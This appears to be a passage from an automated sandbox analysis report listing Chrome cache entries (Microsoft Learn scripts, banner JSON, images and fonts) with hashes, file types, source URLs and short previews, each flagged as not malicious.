                                                                                SHA-256:BBFDC9BEFB184EF4CB2ABD0360C09D1181AEED5CFAF9C451196AFC07C56A880D
                                                                                SHA-512:4CB2340901366079C90B53FAE25E706375193717363BFC792840217FDB0C16279D0A7478E5C4EB6A595E30F3FF847235B9940ED62BE817A1EFCD3AE047B8F7BA
                                                                                Malicious:false
                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_2={},s="4.3.2",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",Ce="prototype",g=Object,h=g[Ce];function m(e,t){return e||t}var y,be=undefined,C=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",Te="call",k="toString",P=m(Object),O=P[E]

                                                                                Chrome Cache Entry: 190

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):72
                                                                                Entropy (8bit):4.241202481433726
                                                                                Encrypted:false
                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                Malicious:false
                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                                                Chrome Cache Entry: 191

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):16915
                                                                                Entropy (8bit):5.1454972531227545
                                                                                Encrypted:false
                                                                                SSDEEP:384:cF31RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16szFrHrmFIN1G:63rlOVqnACpK3o3hhl0OU2/8BlsRw/6J
                                                                                MD5:D99DF13E2AF3BE4AAC14DF9D3F94312F
                                                                                SHA1:627CB2614558CF689B207D282BF933EECBF9552A
                                                                                SHA-256:BC774794A71CA75D065AFDDD0A188ACD991E525E4A51EFBF6A74921BD4D6DD10
                                                                                SHA-512:EEC024DC9E4565E6A1AF43F07061A4C58463A1CAE8C86DD7A641105DCD5F269B9622EFB33FEA4A364BC6EFCF8B5EFF7719F87DAFE62BB664EF2E2BB88AB5C2DD
                                                                                Malicious:false
                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

                                                                                Chrome Cache Entry: 192

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                Category:downloaded
                                                                                Size (bytes):207771
                                                                                Entropy (8bit):5.4194316845132855
                                                                                Encrypted:false
                                                                                SSDEEP:3072:hAuzoOXZhSHYBdBthJd3CUMD5P55MekvFjPrYFc1Tb:h/zoV4zfqxXMeCFnYcTb
                                                                                MD5:9F127FCE3746D2B744C944488BB2F2DD
                                                                                SHA1:8EF39E285C9BE04D3A26735A7C738EFABF9E17F0
                                                                                SHA-256:BBFDC9BEFB184EF4CB2ABD0360C09D1181AEED5CFAF9C451196AFC07C56A880D
                                                                                SHA-512:4CB2340901366079C90B53FAE25E706375193717363BFC792840217FDB0C16279D0A7478E5C4EB6A595E30F3FF847235B9940ED62BE817A1EFCD3AE047B8F7BA
                                                                                Malicious:false
                                                                                URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_2={},s="4.3.2",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",Ce="prototype",g=Object,h=g[Ce];function m(e,t){return e||t}var y,be=undefined,C=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",Te="call",k="toString",P=m(Object),O=P[E]

                                                                                Chrome Cache Entry: 193

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                Category:dropped
                                                                                Size (bytes):1154
                                                                                Entropy (8bit):4.59126408969148
                                                                                Encrypted:false
                                                                                SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                MD5:37258A983459AE1C2E4F1E551665F388
                                                                                SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                Malicious:false
                                                                                Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

                                                                                Chrome Cache Entry: 194

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JSON data
                                                                                Category:downloaded
                                                                                Size (bytes):16915
                                                                                Entropy (8bit):5.1454972531227545
                                                                                Encrypted:false
                                                                                SSDEEP:384:cF31RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16szFrHrmFIN1G:63rlOVqnACpK3o3hhl0OU2/8BlsRw/6J
                                                                                MD5:D99DF13E2AF3BE4AAC14DF9D3F94312F
                                                                                SHA1:627CB2614558CF689B207D282BF933EECBF9552A
                                                                                SHA-256:BC774794A71CA75D065AFDDD0A188ACD991E525E4A51EFBF6A74921BD4D6DD10
                                                                                SHA-512:EEC024DC9E4565E6A1AF43F07061A4C58463A1CAE8C86DD7A641105DCD5F269B9622EFB33FEA4A364BC6EFCF8B5EFF7719F87DAFE62BB664EF2E2BB88AB5C2DD
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

                                                                                Chrome Cache Entry: 195

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 1000x300, components 3
                                                                                Category:downloaded
                                                                                Size (bytes):32805
                                                                                Entropy (8bit):7.082331056664266
                                                                                Encrypted:false
                                                                                SSDEEP:384:ae0XJjwLfLdfp95MEaAWkCMHV8aDYYmZHk94sOWricY6AGnS74EV3rExl5SJT5hk:ae0Wlztd8h5Tc3P2Cl5SPhjakA
                                                                                MD5:64D3BE46EB793F6FE19BEE805638CB80
                                                                                SHA1:93BD75CF654214F8A76AF8E1290499147D971C5C
                                                                                SHA-256:74C048FD2C6C9516438DB1F627419A783622ABCDC0522A5C4A1A568317A3D13C
                                                                                SHA-512:4646AC163DCC465669A868003B2667752EEF8CAD1F40DBFF48C7F5D4C5F2120637F2514A0202F2008D52EDFB377D1341D1B0411E556011CE9E2DE194EE405908
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ai-skills-challenge-fall-2024.jpg
                                                                                Preview:......Exif..MM.*.............................V...........^.(.......................i.........f.......H.......H..............0221....................0100..................................,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Chrome Cache Entry: 196

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):1478
                                                                                Entropy (8bit):5.030941252322257
                                                                                Encrypted:false
                                                                                SSDEEP:24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
                                                                                MD5:020629EBA820F2E09D8CDA1A753C032B
                                                                                SHA1:D91A65036E4C36B07AE3641E32F23F8DD616BD17
                                                                                SHA-256:F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
                                                                                SHA-512:EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028325950/global/deprecation.js
                                                                                Preview:// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..

                                                                                Chrome Cache Entry: 197

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):15427
                                                                                Entropy (8bit):7.784472070227724
                                                                                Encrypted:false
                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

                                                                                Chrome Cache Entry: 198

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1478
                                                                                Entropy (8bit):5.030941252322257
                                                                                Encrypted:false
                                                                                SSDEEP:24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
                                                                                MD5:020629EBA820F2E09D8CDA1A753C032B
                                                                                SHA1:D91A65036E4C36B07AE3641E32F23F8DD616BD17
                                                                                SHA-256:F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
                                                                                SHA-512:EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
                                                                                Malicious:false
                                                                                Preview:// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..

                                                                                Chrome Cache Entry: 199

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 19360, version 1.0
                                                                                Category:downloaded
                                                                                Size (bytes):19360
                                                                                Entropy (8bit):7.98883650859826
                                                                                Encrypted:false
                                                                                SSDEEP:384:0A0OhWXsvqYnHNCyX/Bn9X5uB01I5u0gzRO4i:GOhWXsvqKNf/pue1F1QP
                                                                                MD5:74F49BCDBD13777670657D78944E97F8
                                                                                SHA1:862256ADDFC55950FA4B4DA43E5619C24722BD31
                                                                                SHA-256:1F4AA7693F801EA02E189C3B85101E1A5C24FFD6C335D54D1B212F9981EA3F05
                                                                                SHA-512:C699383350446F3F665418EDAF74E4E235532963801CE3C9FD57F49526AEB9B8FB6CB28FD9BB0A3E65A0521029B4D1821EADE0E8A5D56EEAFDCA244650DD9F8D
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028325950/styles/docons.79a266d.e26ff38a.woff2
                                                                                Preview:wOF2......K........l..KM.........................T.V......|..a.6.$........ ..y..c..~...wT.y.......V.(......'$.1..z..U..`J'p.1m..v...Y.^R.&KY.D.....K9..]..a..v...Q5....-".<...y.N#bi.lX.....{{.v...O. .$ES$x.?...!pLe..x...y.`pN..'r....^%..m..........n5...@.-@....C..%.....@..%........,p*x.`,g.D....g.{+..l............. ,...`....u.mZ...V`H...U@..*ip^.y.v...ZZi.!...I............4M...-I.<.Ld..?_N.g........ds.@.......\..t.0..$6,...%J...e.hO@..L/....'W..D]...d..T..<....K...9...m.0.......[M.....G.....E`..........aCJ.V......| h..w.g.p....9...4."OaL.,......WU[I..-W..iM.e..]..,#~....O.....h...@H~......XJ....@..!.y ....L...6.7.^........^U.....J...~......$#%B<!!.......MT...H......\.I."......S`Py.d..//<L....8...M.s.I.~i..T.9.Hc.c0}....3.)U..........b&].B.m..n...%.gZ.L.&.9%q.#..}.|.%.xii..A..Y....p\2....O.O./..._6.8.i...m.yb.......'b=...e.s.O.?.x......M..O. o.^4o.....}.N.+.w.........?......$..P.....G....P.hz.w:.N.ue}..>W.A..#..`..Ya..\... ......f.U.k|.:.=,.IT.v.h

                                                                                Chrome Cache Entry: 200

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):52717
                                                                                Entropy (8bit):5.462668685745912
                                                                                Encrypted:false
                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                Malicious:false
                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

                                                                                Chrome Cache Entry: 201

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):52717
                                                                                Entropy (8bit):5.462668685745912
                                                                                Encrypted:false
                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                Malicious:false
                                                                                URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

                                                                                Chrome Cache Entry: 202

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):1173007
                                                                                Entropy (8bit):5.503893944397598
                                                                                Encrypted:false
                                                                                SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

                                                                                Chrome Cache Entry: 203

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 1000x300, components 3
                                                                                Category:dropped
                                                                                Size (bytes):32805
                                                                                Entropy (8bit):7.082331056664266
                                                                                Encrypted:false
                                                                                SSDEEP:384:ae0XJjwLfLdfp95MEaAWkCMHV8aDYYmZHk94sOWricY6AGnS74EV3rExl5SJT5hk:ae0Wlztd8h5Tc3P2Cl5SPhjakA
                                                                                MD5:64D3BE46EB793F6FE19BEE805638CB80
                                                                                SHA1:93BD75CF654214F8A76AF8E1290499147D971C5C
                                                                                SHA-256:74C048FD2C6C9516438DB1F627419A783622ABCDC0522A5C4A1A568317A3D13C
                                                                                SHA-512:4646AC163DCC465669A868003B2667752EEF8CAD1F40DBFF48C7F5D4C5F2120637F2514A0202F2008D52EDFB377D1341D1B0411E556011CE9E2DE194EE405908
                                                                                Malicious:false
                                                                                Preview:......Exif..MM.*.............................V...........^.(.......................i.........f.......H.......H..............0221....................0100..................................,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Chrome Cache Entry: 204

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):13339
                                                                                Entropy (8bit):7.683569563478597
                                                                                Encrypted:false
                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                Malicious:false
                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

                                                                                Chrome Cache Entry: 205

                                                                                Download File
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                Category:downloaded
                                                                                Size (bytes):17174
                                                                                Entropy (8bit):2.9129715116732746
                                                                                Encrypted:false
